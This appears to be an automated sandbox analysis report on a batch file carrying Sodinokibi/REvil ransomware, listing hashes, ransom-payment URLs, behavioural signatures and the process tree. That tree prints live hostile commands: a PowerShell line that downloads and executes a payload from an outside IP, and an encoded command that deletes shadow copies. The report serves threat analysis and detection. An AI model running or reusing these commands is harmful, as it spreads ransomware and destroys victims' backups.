Analysis
-
max time kernel
108s -
max time network
108s -
platform
windows7_x64 -
resource
win7v200410 -
submitted
18-04-2020 15:10
Static task
static1
Behavioral task
behavioral1
Sample
u3CD1fs9.bat
Resource
win7v200410
Behavioral task
behavioral2
Sample
u3CD1fs9.bat
Resource
win10v200410
General
-
Target
u3CD1fs9.bat
-
Size
192B
-
MD5
775b9f9c687e640c4e5a65c9512ef573
-
SHA1
920bb3ec6c979520acefcb233670b18446ed09e9
-
SHA256
97b4b68e56ffee83aa062e9f016df1f5c2e280b6df581deec97ced89667e8d1b
-
SHA512
e41e431075bf6869cfa5b1e90c267545f30bf7548fb91e7d729292b2a20b376553807ff45970250bf53e568cdc894e4482c77e82b98ac8c84403cd31d73b2a69
Malware Config
Extracted
http://185.103.242.78/pastes/u3CD1fs9
Extracted
C:\a55i656bw-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/86A547CCAB237928
http://decryptor.cc/86A547CCAB237928
Signatures
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 1792 powershell.exe 1792 powershell.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 3 http://185.103.242.78/pastes/u3CD1fs9 -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Drops file in Program Files directory 16 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\a55i656bw-readme.txt powershell.exe File opened for modification \??\c:\program files\EnableSync.edrwx powershell.exe File opened for modification \??\c:\program files\SuspendGet.odt powershell.exe File created \??\c:\program files (x86)\a55i656bw-readme.txt powershell.exe File opened for modification \??\c:\program files\LimitGrant.snd powershell.exe File opened for modification \??\c:\program files\CompleteUninstall.dotx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\a55i656bw-readme.txt powershell.exe File opened for modification \??\c:\program files\RegisterUnregister.mpg powershell.exe File opened for modification \??\c:\program files\SaveRepair.emz powershell.exe File opened for modification \??\c:\program files\ConvertToRestore.ttc powershell.exe File opened for modification \??\c:\program files\DisableUndo.au3 powershell.exe File opened for modification \??\c:\program files\JoinClear.pptm powershell.exe File opened for modification \??\c:\program files\SwitchUnprotect.wm powershell.exe File opened for modification \??\c:\program files\UpdateUnpublish.xht powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\a55i656bw-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\a55i656bw-readme.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3z583vgo9pw.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1684 wrote to memory of 1692 1684 cmd.exe powershell.exe PID 1692 wrote to memory of 1792 1692 powershell.exe powershell.exe PID 1692 wrote to memory of 1792 1692 powershell.exe powershell.exe PID 1692 wrote to memory of 1792 1692 powershell.exe powershell.exe PID 1692 wrote to memory of 1792 1692 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeBackupPrivilege 1508 vssvc.exe Token: SeRestorePrivilege 1508 vssvc.exe Token: SeAuditPrivilege 1508 vssvc.exe Token: SeTakeOwnershipPrivilege 1692 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1692 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1692 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\u3CD1fs9.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/u3CD1fs9');Invoke-BJZXVCQKO;Start-Sleep -s 10000"2⤵
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Blacklisted process makes network request
PID:1692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1508